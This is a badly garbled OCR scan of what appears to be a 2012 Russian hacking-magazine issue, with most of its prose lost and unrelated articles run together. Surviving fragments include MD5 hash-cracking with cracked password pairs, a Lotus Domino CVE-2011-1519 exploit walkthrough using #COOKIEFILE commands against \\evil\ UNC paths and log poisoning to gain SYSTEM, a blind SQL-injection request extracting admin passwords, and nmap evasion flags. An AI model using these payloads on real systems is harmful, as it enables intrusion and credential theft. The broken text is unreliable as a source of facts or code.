0 .54 s
1.03
ttuo!othe :opcrat1on:
tUoe: ot di1Jr n ad:
ha ' h ' redu.c:e c:aleul at 1ono! d'la1ntraver se:
h as h ,
0.01\
~.~3
99!
7!
3. 46
ll!illi~nl
4.1161111lli!!ll/ l
MD5
,
.
ecrypted.dat
. 80- ,
IGHASHGPU:
, 640 1 ,
. ,
. ,
. ,
cOOI:
2003 , , ,
f48494761d277762
f2da2e2a5a215b66995de1f9327dbaa6
c7f7a34bbe8f385faa89ae4a9d94dacf
-.
9478151927242f5
- << >> .
eea931d3facaad384169ebc31d38775c
49d854799ff9f8458
- [ ,
encypted.dat lghashgpu
:
64 ).
, .
. ,
. ,
.
lghashgpu
ighashgpu _ esults.txt :
, n <<>>
. .
, n
feb46ac8494761ad2eaa7776c2a:1rootxceel
. ,
f2da2e2a5a21Sb6699Sde1f9327dbaa:pwd12xceel
c7f7a34bbe8f385faa89ae4a9d94dacf:pwd34yceel
. << >>
ccb9a4e7eBa151ec927e242feacS:pwd56yceel
4966d8547ccee99aeffe9f6845Be:pwd9Bzceel
eea931d3facaad384169ebc31d38775c:pwd78zceel
, .
IGHASHGPU:
n n>> .
, :
ighashgpu.exe -h:42151cf2ff27c5181bb36a8bcfafea7b \
-t:mdS -u:[abcdefghijklmnopqrstuwvxyz123456789e_] \
-asalt:s41t
RAINBOW TABLES
<< >> - ,
062
85-99%.
01 / 156/ 201 2
MD5
Linux . n : LN /
NTLM, MD5 SHA1. ,
- .
<<
MD5.
n: , ,
. n n F
Rainbow
,
>> .
MD5, SHA1, LM
NTLM.
,
>>
. :
SHA1-
200
LN/NTLM, MD5
.
tg, RainbowCack. n
:
SHA1);
chaset- ,
c haset . txt;
plaite xt_le_m i
plaintext_len_max-
, [it.ly/dT8M).
n:
1.
tae_index- >> ,
.
, .
2.
3.
chain_le- n .
>> .
hin_um- n .
n .
4.
pat_index-o , .
0).
>>
MD5:
) ~
GPU
CPU
4
5
ee:ee:el
ee : ee:el
::l
::
: :9
: :l
::l
ee:es:21
: : 1
. ltel
ee::ll
9:27:52
::4
zeee
9755489
Atom N450
:). md5_
lowealpha-numeic#1-7_0_200097505489 _.t 1,5 .
,
,
,
GPU
CPU
>> .
. n
tsot.exe:
rtsort.exe md5_loweralpha-numeric#l-7_e_zeeex975e5489_e.rt
. ,
4-
5- ,
n .
l
. :
. ,
d8578edf8458ceefbc5ba58c5ca4. cack_gui.exe
- .
File .
. >> .
Seach
Rainbow s ...
Rainbow .
md5_loweralpha-numeric#l-7_e_zeeex975135489_e.rt,
Open. n !
.
.
- , ,
MD5
SHA1.
SHA2 S
[ ). - ,
.
, ,
>> .
lghashgpu
- ,
n D5- , ,
. ,
RainbowCack
01/156/2012
100 %,
. ::::
063
EJ
RDP
Plugtns
ots tist
Ftles
.-6
setttnas
Spy
....
f! Anti.&i..Rud
FF -binjW:
Op<tr fongnobbo
Ch rom formgibet~
Spy
...,
Installer
---------- conflo.php
- - - - - - -- - - - - - ,
ll'!y5QL
( forCP):
---:--'=:...:;:=
,. .,...., ._~ID.ot--1
~ - ( III..">!.J18)' )
YDUI"Javakrlplla
....-.
~ ( IINI8t1o011!YC.I'P8"'"'Y )
YowJavaScriptl8t.. .,.dofi . Piea , anablly-JS
~h l
P18a. an111
-~ntf -CO<N~---
~ - I I1>811nl:ti'J'~"J' (
Y-JavaSc.pel8t,.Ndotf. PI8"a, ana.
v-Js
Plea , e~~terp.~oword
WWWI'IDVI\1 ~ l ,twJt,oonl
e~bl!_~ ~
Lotus,
IBM Lotus
Domino Server
-
IBM Lotus
Software,
IBM Lotus
Notes.
www. zerodayiitia
tive.com - ZDI;
www:ii)m.com/software/ru/lotus/ -IBM
Lotus Software;
buatraq.ru - BugTraq;
LOTUS DOMINO CONTROLLER
dj.navexDress.com -
DJ Java Decompiler.
, ,
,
.
.
IBM,
.
, ,
. .
Lotus
Lotus.
: , , . . ,
, .
.
- ,
.: ]
,
.
, ,
, .
Lotus
CVE-2011-1519
[ , ]. ,
. : ]
- , ,
ames.nsf - .
, ,
8.5.2FP2.
exploit-db.com
Lotus
ZD I ZDI-11-110,
Oday ( ].
<<
Lotus Domino S v
tll.
BugTaq ,
ZDI,
IBM suit-
, -
2050.
, ,
COOKIEFILE,
068
01 /156/20 12
Lotus,
gm Files\IBM\Lotus\Domino\Data\domino\java\dconsole.ja
UNC,
n Jv- .
. ,
, NewCiient.class,
SYSTEM>>.
~ COOKIEFILE
11 sl-
i f (sl.equals( "#EXIT" ))
return 2;
, ,
2ese/tcp
11
, ,
2050.
, Lotus .
.
, .
, ,
,
nmap.
Ltus-,
, ,
.
11
socket:reconnect_ssl()
pwd = stringtokenizer.nextToken().trim();
return ;
socket:send( "#API\n" )
socket:send( ( "#UI %s,%s\n " ):format(user,pass)
socket:receive_li nes( l )
.
:
socket:send( "#EXI\n" )
/*
, Ltus-
*/
do {
: SSL- ,
#>>. ,
/ / ReadFromUser-
int i = ReadFromUser();
admin pass
#UI admin,pass.
, ,
nmap
COOKIEFILE . ,
i f (i == ) { // #APPLET
appletConnection = true ;
continue ;
, #COOKIEFILE \\evil\
file. , ,
[ ,
! .
userinfo = UserManager.findUser(usr);
i f (userinfo == null) {
/1 . .. !
WriteToUser( "NOT_REG_AOMIN" );
continue ;
. ,
Java, IDA , -
. DJ decompile [ membes .
i f (!appletConnection)
// #APPLET,
fiag=vrfyPwd.verifyUserPassword(pwd,userinfo.userPWD());
else // #APPLET
/ 1 COOKIE? !
fiag = verifyAppletUserCookie(usr, pwd);
} while ( true ); // end loop
i f (fiag) // ,
// , !
,
#APPLET
#UI #COOKIEFILE. ,
, ,
Nt-
01 /156/2012
069
admindata.xml. , no n,
[ NOT_REG_ADMIN !'
LOAD CMD.exe
BeginData
<<
. n
n
#APPLET ,
adm, n
cookie .
~.
n #UI, n
veifyAppletUseCookie:
, #COOKIEFILE.
,
//#COOKIEFILE <cookieFilename>
i f (cookieFilename == null 1 1 cookieFilename.length()
return flag;
/ / - !
#EX IT
,
' ? n
,
LOAD, n
n.
,
n . , IBM
LOAD
// s7do {
if ((j
cookieFilename
, n.
, m-, n , n
. LOAD
n , n n
s =
25
#L
#COOKIEFILE \\fileserver\pulic\cookie.xml
#USERADDRESS dsecrg
#UI usr,psw
VALID_USER
#
$whoami
whoamiBeginData
while ( true );
, n
usename, passwod addess usename, passwod
addess cookiefile, ,
n n' ,
:
1.
<us> .
3.
4.
n ,
C:\Lotus\Domino\data>
n , n
n .
, n
CVE-2011-1519
.
1.
C:\Lotus\Domino\data>whoami
NT AUTHORITY\SYSTEM
cookie.xml:
?
<user name= "usr" cookie= "psw" address= "dsecrg" >
, . ?
, -. - ,
n, usr .
2.
n ,
, n \\fileseve\puic\cookie.xml.
3.
n ncat:
c-..-.. ~no
'"...........
C'adlf.Ctt.&........Joo
Lqou-os.Fn,OJOcc:OII
c...
,..nw,_,...
C...tllll~ll:
25
#L
..._, L., ~
070
01 / 156/2012
Lotu s,
S- ? ,
, UNC (
, !.
,
- . , IBM
, : cookiefile
.>> . ,
- \\evil\cookie\file,
1.
, : .\\evil\cookie\
file, UNC . ,
. , ,
SSL-,
[,
i,
ARP-POI SONING,
DoS -
mail . u l.
IBM! , cookief il e,
, - L-
2.
, .
L- . XM L,
- , [
' , , IBM,
l. ,
, ,
L- :
, ,
[,
.
Bla-a-acuser
! - ,
- ,
dsecrg"NYA>
4.
>>
Java 6
ASLRI.
. .
. , , ,
1.
99
cookievalues Microsoft I
HP/1.0\r\n
#APPLET
#COOKIEFILE .. \ .. \ .. \windows\system32\logfiles\httperr\
httperr1.log
#USERADDRESS http://twitter/asintsov
#UI admin,pass
\r\n
2. - :
#5oftware: Microsoft ! 2.0
#Version: 1.0
#Date: 2011-08-22 09:19:16
$whoami
NT AUTHORITY/5YSTEM
UNC,
- .
. -,
,
, .
: IBM
-, .
<user >> ,
-, ,
%20>> [ , !. ,
- [
, <use r >>
, LOAD TELL
( 404 NotFoudl .
!. -
3. ,
-, :
admidata . xml.
MD5. ,
4, 25 26 ,
. ,
#!
, ' I
01/156/2012
071
scarletO
....
-
""""'
URL:
Windows
3. 14.y/r u/md5
Windows
URL:
......,...
,.,
. "'
Win dows
cel1697i845
URL:
bit.ly/v mJ2g8
-~
~
,""
'
'
..
:. ~
'
. ..:;:;
. .
~
~
'
, n
SQL-
D5-
.
,
, -
MSSQL.
n n
n ,
, ,
n SQL-.
5-
? n
. ?
npor :
'
Microsoft
SQL Server;
GUI-
, ,
, ;
MD5;
, ,
u :
1.
2.
1.
. n,
3.
'
4.
'
,
,
URL
[, site .com/script.asp?id =11
.
2.
lntel 2
Radeon:
AMD BROOK,
CUDA
NVidia.
:-1
072
n;
, n .
n
.
,
.
01/156/2012
X-Tools
PANBu ste - ,
, l
:
Security
! .
1000 BINI;
PAN
My5QL, M55QL l-l,
P ostge5 QL , Exce l, VMwae VM DK, l
PAN ! ! .
!);
PCI 055,
, PANBuste
I.ZIP,
.GZ, .TGZI;
PCI Q5A,
Research Labs
URL:
www.xmco.fr/
panbuster.html
.
: -
*nix/win/mac
JCB, D iscove,
Chia Unionl;
!
Windows,
L i u x,
05 ;
IV15A,
:
I
1./pabuste
-1 ../1 ,
!
- -! .
URL:
bit.ly/vZbhcN
:
it.ly/vDpEtB
Windows
SuRGeoNix
URL:
~ ----..
it.ly/IXxlkm
=-
Windows
*nix/win
'~
WEBSURGERV, _ __
W5'
, sn- . ,
. ,
, 55,
Joomlal
Web5ugey : -,
5QL-
. ,
Do5
WAF,
- .
. , DDM g -
- .
sn-
n,
WAF
5Q L-.
vuln.php,
1. n llnitial Requestl:
5- .
HTML-
! ,
);
My5QL
/1.1
IList Configuationl :
- 1 32l MD5-
DDMg
xe al, -
. :
.
,
3.
joomscan.pl -u http: // joomla-site.com/ \
- pro xy: port
01 / 156/2012
GET /v uln.php?id=1+and+'${List_2}'=
substring((select+password+from+admin+
limit+1),${List_1},1) / 1 . 1
HOST: 1.2.3.4
073
071,
01/156/2012
, ? H ackespace
hackspace- ,
. ,
>>
I.
n .
. ,
n, ,
, ,
, , .
, ,
- ,
, >>
n . ,
, ,
, . -
, n
do it youself
[ ]. , -
{neuron}
.
,
.
,
,
-
,
.
,,
01/156/2012
075
:1.
,
,
-
,
. ,
,
ha ck e s pa c es.og ,
,
. - ---
.
, ! .
<< ,
.
,
>> ,- ,
Nu
l n e u o nsp ac e . u ).
<<
. ,
FOSS Labs
C-Base. n !
:
, ,
-,
, ,
N u
! ,
, -. ,
- ,
<< :
leSage lab,
, , ,
, ,
. ,
. ,
30-50
1000-1500
. ,
, -
, - ,
, -
, , ,
- : D- ,
. ,
, ,
C-base
NYC Resistor
n : , .
n: , .
n: , - .
: 300+.
:
: 300+.
:
: 30+.
5 .
076
17 .
C-base
1995 .
2009 ,
www.nycresistor.com .
11
RESISTOR
$75-115.
NYC Resisto-o
2008 .
01/156/2012
], IFaiwaves, ]
leSage laI .
l'hls 11 1 comprehenslve, user~al ntalned lllt of 111actJve hecklrtPICII throughout the wortd.
. , ,
f-J>>,
,
.
, , , ,
th4i
in
c loaed.
Ustoft:vt:ntli
his ~
is cac:had dua to its long renOenng time . lf you want to tluah tn.
, ~
LRtof~WC>Jt:ds
Liep
:o-addaproject
iltii/W
)'1)
1 Tt lflln 1
Recenlchanou
1 ""'''"' 1
, .
- ,
, ,
Aall!tlld o:NIIOCI
--
~
.
Z;,;Ic
:0-:"-:--iljiL-'
t-,1
. ,
sp.t:, 01'
yOtJ wt:nt
t:nd,f ~ alt.lt
hadr.erspace
to c railtt: new
orr , /801 51 ~
to th4 h t .
C-base .
bttpl/aQLadwrtrtChprgdl
NOvemII'"
....
PILAIO
OSG - Optn
lgrj1tpry
1i11:IJJ:i
--
n:_
"'"
Nove mef
, .
. ,
htI/www ISJ!Dtrk,ac
cpmrf
Novernt>.r
, ,
, - , ... ,
:]. ,
2011
, .
Nu
u s . u .
. ,
!
30-]. Nu
dui. ,
, , .
. ,
! -
<<
Softwae Defied
, , , :
WiMAX GS
. ,
?.
D-. ,
, ,
. ,
Nu,
Radio,
15-17 .
15 ,
150,
, .
,
iberpipa
Metalab
: www.kiberoipa .org .
: , .
: 20 40 ,
n.
Ca : www. metalab . at .
: , .
: 130+.
:
>> -
!
, ,
,
20 .
: .
18'.
kiberpipa
___:_ _ _ _ _ __.J
. , 2001
2006 .
, ,
-.
01 / 156/ 2012
, !,
Metalab
].
>>,
!
- HackSpace Sait-Petesbug,- -
077
.
- .
,
.
<< : -
3D-, ,
n , , n
3D- -
.
,
~
, , ,
n ( hackspace-spb.u ].
n .
,
,
, (
(polakumekay.
com]. ,
29 .- .
, . n,
Mifill] : , -
: <<
. -
. ,
40 . -
, .
. : ,
. ,
, .
( ]
. ,
, .
, ,
n C-Base, , ,
078
01 /156/2012
. ,
,
[Space Foundation
, !,
,
,
~
. ,
, .
Neuon .
100 .
120 .
[ !,
.
<< :
.
, ,
. n
NYC Resistor
. ,
. , ,
, , ,
:1.
-,
,-2.
[, -
Neuon n
$50-100,
, !,
n .
[, ,
, n
10-30 !. ,
. , ,
- ,
- ,
, ,
- .
C-Base
, ,
300.
- . C-base
HackSpace-SPb
. ,
, ,
, .
, .
?
~
, , <<
, ,
Space Foudatio, -
. :::
? .
-
-
NYC Resisto.
, , MakeBot,
30-.
-
30 .
. ,
-
.-
NYC Resistopoca:
. ,
. :1
,
, ,
. ,
,
01/156/2012
200-300 -
079
MALWARE
.....
Stuxnet
IDA
Stuxnet,
. ...
WIN32/DUQU:
Certificate
- . -
STUXNET
~ Certificate lnformation
RSS- .
-Media
Stuxnet ...
. ,
Electronics Incorporation
Symantec,
, - , - -
sh
Stuxnet
Duqu. ,
Stuxnet. , Duqu
, Stuxet.
=1
Instal Certificate ..
Cyptogaphy
Issuer Statement
. , CySyS
-
080
Duqu
, .
1. - !
01 / 156/ 2012
void
Verity Certificate
OtcrRoutit~e ( int ,
<'~
.. ...
chr
Yff~r .
int
lkrff~rSiz
,.,
Jb
sh01' t
'"
test
&uffl!rSizt
l_129!
[ +8 ]
edi , Bufftr
[es i +r:di ] , cl
~l
-......,
,
City/Location : Taipei
Serial Number:
t:cx ,3
State: Tai\1an
Country:
esi, es1
loc_12919 ~
ea: ,8471122h
I!CX
edx,
1E2060A3n
eu ,
....
ex ,4747293h
edx , OCh
loo
add
I!Si , l
'"
,
esi , ebx
~.
jb
edlf,
short
l_129 10
loc_l293A~
esi
.2. .
4. n
IU:teiiiili
Duqu
5.
Stuxet
, .
cmi4432.sys,
, ,
, VeiSign
Duqu,
Stuxet,
2012 ! 1].
Duqu :
0) d-,
, CVE-2011-3402.
1) -
. ,
.
w i32k. sys.
2) -,
DUQU
,
,
3)
4)
Duqu
3.
, .
n ,
sevices .e xe
. ,
Duqu
. .
n , .
Duqu
Stuxet .
Duqu
4.
-, .
Duqu
, , ,
, -
Name
Stuxnet.
5
Stu xnet, 6- Duqu .
Size
LJ 566168ff21437205807
LJ Oeecd17621535878724fd800
LJ 94c4ef91dfcd0c53a96fdc387f9f9c35
LJ 4541e850a228eb69fd0f0e92462445
u 9749d38ae9b9ddd81b50aad679ee87 *
b4ac366e24204d821376653279cbad86 *
u e8d6b4dadb9ddb58775e6c85O6cc *
192,512
24,960
6,750
29,568
85,504
232,448
6,750
[,
) : , ,
, , , , , , .
, .
, ,
Duqu
Stuxet.
,
. ,
,
. .
01/156/2012
Stuxet,
Duqu.
081
MALWARE
, .
Win32/Duqu,
n,
n .
, n , n n
n n .
,
Duqu
, !
, !.
. ,
.
7. n
main.dlliocoo
Duqul,
U-.
7 ,
n .
072, 073,
034, 099,
0x7l,
098, 0)
= 0
<<Duqu: the
for ix in xrange(len(data)) :
data ( ix] = ga!.ma ()
= + l
if == 7:
us
36
. ,
n ! 81.
=0
, ,
, , n -
8.
time of infection
to live
.
9.
time of infection
to live
.
10.
14.10.2011
1.11.2011
3.11.2011
4.11.2011
!, ,
!.
Win32/Duqu.
CrySyS
19.10.2011
ICVE-
CVE-2011-3402
Microsoft
Active Protections Program
IMAPPI.
2011-34021,
wi32k.sys
CrySyS, Symatec
Microsoft .
CrySyS.
TrueType .
,
.
082
01/156/2012
1 -~ "i.
!..-. ; -
~-~ ,. .?J
SD-
r-
l
-- r==:::: .
r:::-1-,---'--;
1-day
0-day
~ <non""'"" RPC-np""'"'
( )
, ,
36 ,
30 .
11.08.2011,
36
7:50 :01
, 9,
18.08.20 11 , 7:29:07
R-
30 -
10.
DUQU VS STUXNET
R-
Visual ++
ATL
UPX
Duqu St uxnet. R-
Stuxnet. Duqu n ,
n <<Stuxne t unde
RpcHandler_ '-
the Mi coscope l.
CeatePocessll;
56-57),
n.
RPC
Rndl_S - (,
n Duqu BinDiff,
);
Rndl_6 - ;
11).
Rndl_7- .
, n
Duqu . RPC :
RpcHandler_1- ;
RpcHandler_2 -
12.
R -
Rndlr_- ;
?
-
Stuxnet
80
: ) ,
<<?>>.
,
. ,
. , Stuxet, Duqu
. ,
Duqu,
,
,
r .
- ,
.
, , ,
.
12.
01 /156/2012
Duqu . :::
083
- - .- __ _
-------.---..._
-... ----------------...
--.----...
------
---------______...... ---..-
___
...._
___
-___ __
-----..
--------
__ ___. . __
-----.....
----~
...........
,",__,_
-~--~....
....
~---....
....
...,_,""__
1
2-
W.1r 3
<tr -1
<~
11 ~ >
.. .
(>~ n .. .
.. .
1i32/ G h odo N. NA D
r1
ESET
r
11 . r 1
.
r r1 ,
11
11.
Preview
UNIXOID
"NRID
gd,
-
,
d id- .
,
firmware.
,
,
,
,
,
, G- . .
-
did-
.
. 1
. 2 .1
8 1.2 81.1
--
. . . .
, ,. , , , .
,,.
.-
-.
Microsoft. -.
. su .
SYN\ACK
11
>> ?
, , ,
SYN\ACK
UNIXOID
01/156/2012
<<
100 .
.
?
FERRUM
-NS'
Petium
ID--su!
, 12
NAS'e .
,
,
. .
087
OCCTEMO.NETFRAMEWORK
Stong name
- n ,
, ,
.NET
F amewo k,
System.Secuity. Cyptogaphi,
,
CL R
.N ET
F amewok
.NET,
SYSTEM .SECURITY.CRYPTOGRAPHI
, ,
System . Secuity.Cyptogaphi,
-
n
[].
- ,
, - . .;
-
, . . ;
htto: Uaacbowse r.
ogsoot .com/ -
GAC
ws.
.509 L-
[XM L Sigatuel.
,
,
bjt.[y/uyxZs5
- ,
28147-89
088
F amewok
.NET
#.
[.
1]. ,
Symmeticlgoithm, -
01/156/2012
.N-
AssymeticAigoithm, - HashAigoithm
KeyedHashAigo i thm ,
-.
.NET
-1
, ,
.
28147-89
, ,
~.
SYMMETRICALGORITHM
.NET Famewok
SymmeticAigoithm.
MSDN,
puic
puic
.........._
RSA
DE-DEOES
--
pulic
OSA
AES
RC2
puic
-.._
----
.n
11
1
1 4
1 LJ
1 4 ~
1_, _ _
11
11
4
11
11
4
1
LJ
1
4 ~- ~
,. _
~ : """"""" ~
~ 8fiiOPIIIIII
11
Ass)'metric:~
Ass~uici<~Jonnanor
Ass~U.~
..__
T~S
11
J
1
1
1
IS1
~S
1 --1
1
1
1
......."
$A51 2anaged
.N
1
J
1
1
...,.
1
4...".",....._ 1
.......
1
-~
1
...... _
1
--1
1 -
1
1
1
1
"""""
.....,..
....,.._
...."....,_
Framework
,
,
namespace Gost
. ,
ICyptoTansfom .
puic
MSDN
. ,
ICyptoTansfom
pulic
. :
pulic
byte [] rgbKey,
byte [] rgV
){}
puic
puic
MSDN
, ,
){}
puic
[) .
{}
28147-89
byte [] rgbKey,
byte [] rgV
SymmeticAigoithm, ,
{}
n
, - .
GostCfb(){}
override ICryptoTransform CreateDecryptor
puic
puic
, . ,
.NET Famewok'y
, ,
[CFB).
,
.
KO,LJ,M 28147-89
, 28147-89
[ )
,
.NET
FRAMEWORK'Y ,
,
CFB (r )
01 / 156/2012
(CFB)
089
Gost"
010
~~CickOnce
--
i:.Of.'llj~
..,
l1nl
~rw.....,.~
CJI(:t.a~
!..,1
....,
---
.J
rl
- << >>,
. <<>>
[ , ] ,
....
'""'"""''
[ , ] .
, .
........
~eqlo!IA/I-crpororo~
"
'"--
ToA~oU~OJIO....I"'CCIaQ
8 ~~r:nt1113~-N111,Uf,
010 [object
identificato],
010
[,
XOR . ,
] ,
, .
GetRadomBytes
GeeateiV Gt:
lacs], :
010
IVValue
KeyValue,
. , ,
64 256 .
"2.5.4.49"
puic
GostCfb()
{
LegalBlockSizesValue = new []
{ new Key5izes( 64 , 64, ) };
LegalKeySizesValue = new []
{ new Key5izes( 256, 256, ) };
BlockSizeValue = 64 ;
KeySizeValue = 25 6;
]. ASN.1 ,
,
-
.
www. o i d- ifo . c om .
ASN .1- - -
tnt
tt, GostCfb
, ICyptoTansfom.
ASN .1
ITU-T, ,
GostCfransformEncr:ICryptoTransform
{}
private sealed class
{}
GostCfransformDecr:ICryptoTransform
KACCGOSTCFBTRANSFORMENCR
tnt
-
, ,
, CFB,
. GostCfb.
, << ,
21 , ].
, .
!] ,
.
OID
11
11
11
11
puic
090
01/156/2012
.N-
r~at~ ();
byte[] plainBlock
int result = ;
{Gost.GostCfb)
64
CryptoStr~am ~ncr
CryptoStr~am
11
Array .Copy(inputBuffer, inputOffset, plainBlock, , 8 };
Gost28147 . Gost28147Ecb(m_State, tmpState, m_Key);
Gamm(plainBlock, tmpState, m_State);
Array.Copy(m_State, , outputBuffer, outputOffset, 8}
inputCount -= 8;
inputOffset += 8;
outputOffset += 8;
result += 8;
CLR
28147-89.
return result;
16
16 ! . , ,
HashAigoithm, , ,
. ,
KeyedHashAigoithm :
XOR.
, ,
28147-89 Gostlmito.
Ke yVal ue
Ha shVa lueSize 32,
32 .
TansfomFinaiBiock
TansfomBiock , n n .
,
,
HashCoe
- ,
GostCfbTansfomDec
GostCfbTansfomEncr,
CFB,
, ,
[ ,
!.
, :
DWORD,
16-
KEYEDHASHALGORIH
KeyedHashAigoithm .
HashAigoithm ,
:
--"""'
[~ <CLR2..0
"'""""
0 Solod111No
CLR_.
[8 !
.....t1
\ stmyNemt
lPui~eJ
FSI\Ilp.Lqu.;Servic
FSharp.Pfojtct9-JS\tm.FShlfD
- !~- ;::::~~-::Syattm.PrOPtltYP~s
11-
!Cuituf
0.300flld5
FSI-.rp.\.lgu.;t~S.Vict..It
FSI\arp. Proj\Syl !t.S.It
I.A.-thittctur lv.,.,lon
MOL
09.112010192' :24
09.1120101924:24
09.11 .2010192:24
09.1120101t.24:24
0911201019:2.t:24
""'
M9L
1.00.0
""'"'"
MOL
MOL
03fSf7/11dS
0)15f71tlc!S
0f5f7f1 1d5
hDJMH >d<
GosiAig1
90881J818cl
IE~'::'~"IIVIn
;:;;~;~~
~
SIL
lEost
~fllciS
II Eoat
0300111!5
lnlttoo.SDocVw
lf:k'57eO
U9L
U9L
U9L
ISym\Jptt
ISym\oJr,pper
03f5f7111c!5
32il
~f11d5
S:.!
ISym\oJr~Ptf
"i111!5
)2bll
Of5f1f11d5
S:il
31f38~
MOL
U9l
IS.,.m\kpper
......
~...
01/156/2012
31f3856ad3
GAC Browser
i ~.ttoclified
4.0.0.0
4.0.0.0
4.00.0
4.00.0
""'
""'
03f5f7f11d5
.:.
2.00.0
2.0.0.0
2.0.00
11.00
2.0.0.0
2.0.0.0
400.0
400.0
6.10.0
6.1.0.0
2311201119~1 :5:5
~ -
"''
v4.0
v4.0
v4.0
v4.0
V4.0
'N"'""'
~
14 0720096:20:09
DWORD,
n 16-
[En c yptBiock161,
.
DWORD
, -,
[XOR DWORD
, XOR !,
, .
140720096:20'09
140720096.20-09
10. 1120101952.
14072009620'09
14072009620:09
09.1120101913.36
09112010191].:1
1: 07200910;: 7:27
1l07200910;47:27
HashFinal
.
vl .O
,,,
F amewok
.NET
GAC.
GAC
.NET,
GAC, Global Assemy Cache [
091
! .
GAC
oidMa p
oid Ent y.
. ,
, st ong
name,
, .
,
sn .exe,
.NET
<cryptographySettings>
<cry ptoNameMapping >
<c ryptoClasses >
<cryptoCla ss GOSTCFB; "Gost.GostCfb, GostAlgs,
F amewok. :
Version;l.e.e.e,Culture;ru,PulicKeyToken;9be88f4818daa492" />
sn.exe -k keypair.snk
Version;l.e.e.e,Culture;ru,PuicKeyToken;9be88f4818daa492" />
<cryptoClass
keypai.sk.
Sig nig
31. .
gacutil,
GAC
[.
, .
.NET Fame wo k .
.NET,
GAC .
gacutil / i
<
>
Pu ic k, Cultue
GAC l,
GAC ws [. 41.
GOSIMIQ; "Gost.Gostimito,
GostAlgs,
</cryptoClasses >
<nameEntry name; "GostimitoAlg" class; "GOSIMIO" />
<nameEntry name; "GostCfbAlg" class; "GOSTCFB" />
<nameEntry
name; "System.Security.Cryptography.KeyedHashAlgorithm"
cla ss; "GOSTIMITO" />
<na meEntry
name; "System.Security.Cryptography.SymmetricAlgorithm"
class; "GOSTCFB" />
</cryptoNameMapping >
<oidMap>
<oidEntry OID; "1.2.43.2.2.21" name; "GostCfbAlg" />
<oidEntry OID; "1.2.43.2.2.22" name; "GostimitoAlg" />
</oidMap >
</c ryptographySettings >
Wind ows,
.NET
GostCfbAig
Gost lm ito.
GOSTC FB
GOSTIMITO,
GostCfb, GostlmitoAig
.
machine.cofig,
XM L
cyp togaph ySet ting s,
mscolib.
Name Mapping.
<na meEntry
name; "System.Security.Cryptography.KeyedHashAlgorithm"
class ; "GOSTIMITO" />
<nameEntry
name; "System.Security.Cryptography.SymmetricAlgorithm"
class; "GOSTCFB" />
:
n cy ptoCia ss,
nameEnty. , ,
l.
010
KeyedHashAlgoithm
GostCfb,
Gostlmito
GostCfbAig
i mito
( KeyedHashAlgoithm )
toConfi
. CeatefomName ( "GostimitoA~.
new
'ect l
= new t
i mitoSt = new
CyptoSteam n
CyptoSteam
- -
SymmeticAigoithm.
51.
{key});
System.Secu
base {object}
object
(k, I V) , CyptoSteamode . Wite );
AllowOnlyFipsAigorithms false
yptoSteamode . Write );
; Non-Puic members
11 (i/ appNameHT
Count =
11 , appOidHT
Count =
11 if defaultNameHT
Count = 125
- DefaultNameHT
Count = 125
DefaultOidHT
Count = 28
defaultOidHT
Count = 28
, InternaiSyncObject
{object}
if MachineConfigFilename
.. "machine.config"
machineNameHT
Count = 3
{[GostlmitoAig, Gost.Gostlmito, GostAigs, Version=1.0.0.0, Culture=ru, PuicKeyToken=9088f4818daa492]}
{[System.Security. Cryptography.eyedHashAigorithm, Gost.Gostlmito, GostAigs, Version =l .0.0.0, Culture= ru,
{[GostCfbAig, Gost.GostCfb, GostAigs, Version=1.0.0.0, Culture=ru, PuicKeyToken=9088f4818daa492]}
,
RawView
092
CryptoConfig
01 / 156/2012
.N -
28147-89
28147-89
,
. ,
:
232
11
XOR,
[8 ! 4
mod 2321,
. [
[SBoxl,
.
31- ,
32
28147-89,
8 .
.
.
7.
KeyedHashAigoithm.Ceate,
.
CyptoCofig.CeateFomName,
Activato.Ceatelstace
catch.
ull .
oidMap
010
29
, CyptoCofig
010
. ,
MSON
, oidEty
[ , , GostCfI,
- ,
mt,
010
, - ,
,
machie.cofig .
010
ivt
machieOidHT, - -pivate
28147-89
CLR
MONO PROJECT
- ,
CyptoSteam,
Steam.
. , ,
Mono,
GAC,
$ gacutil -i
< >
, ,
CyptoSteam ,
- :
- CyptoSteam .
$ gacutil -l
.
-
.
CyptoSteam
,
. ,
Positio - CyptoSteam.
- - . ::::
01/156/2012
.NET Famewok,
093
li v inside . og s p o t .c oml
.
- , :
.
, .
1100- xl 1 .
, ylxl = + 1100- xl 1.
, .
. ,
- , !
;1.
, , = 10,
50
50
19.
, !.
. ,
.. .
, .
. ,
09-'
01/1 56/201 2
,
, , '
,
.
, : lkl + llkl- 11 + .. . +
llkl- k + 11, k - , -
. ., ,
:
200, , 14,
.
:
$ python2 test.py
:
6.889592934
.ss8578
tokens = []
for token in tokeniter:
i f token not in tokens:
tokens.append(token)
600 .
Olnl,
.
tokesite- ,
, .
Oilog nl .
.
tokesite.
n ?
Linux.
if token not in
tokes: >>, -
cpulimit,
SIGSTOP SIGCONT:
, n
. ,
- , .
value ,
import random
import timeit
pid.
CPU, ,
4 -
#
#
f
99999
, 100%, 400 %.
cgoups ,
.
[]
for i in xrange( 1, 2 ):
f.append(random.randrange( 1,
1 ))
...
cgoups :
#
def func1():
tokens = []
for token in f:
i f token not in tokens:
tokens . append(token)
# n
def func2():
tokensdict = {}
i =
for token in f:
i f not tokensdict.has_key(token) :
# :
tokensdict[token] = i
i += 1
ft
01 / 156/2012
$ yaourt -5 libcgroup
________________________
095
,
:
group default {
perm {
task {
uid
root;
gid
root;
admin {
uid
root;
gid
root; }}
cpu
cpu.shares = 10; }}
, - .
: al , l
, .
! !.
,
group daemons/tomcat {
perm {
task {
root;
uid
root; }
gid
admin {
uid
root;
gid
root; }}
cpu {
cpu.shares = 4~; }}
Python.
, URL !
URLI, N
.
N,
1.
theadig ,
event-
group daemons/postgres {
perm {
task {
root;
uid
gid
root;
admin {
root;
uid
root; }}
gid
cpu {
cpu.shares = se; }}
. , ,
.
filteed , .
:
;
mount {
cpu = /mnt/cgroups/cpu;
cpuacct = /mnt/cgroups/cpu;
!
, !.
: daemos/tomcat- 40
n :
postges-
%, daemos/
50 %, default -10% .
IP- - ! ,
. /etc/cgules . cof:
/, !:
<user>
*:tomcat
*:postgres
<controllers>
cpu
cpu
cpu
<destination>
daemons/tomcat/
daemons/postgres/
default/
tomcat daemons/
tomcat , postges- daemos/postges ,
- n default.
, .
nmap, :
--max-rate 50-
50 /;
. ,
-f- ;
-g88- ;
--data-legth
50- 50
/ filteed.
?
/. :::
096
01 / 156/ 2012
-, :
www.mancard.ru
:;;
.
"'
..."'
::;
. ..
<::
:z:
<< ->>.
29.01.1998 N21326"
deeonis ldeeonisc!gmail.coml
Sigleto. , ,-
- .
, -
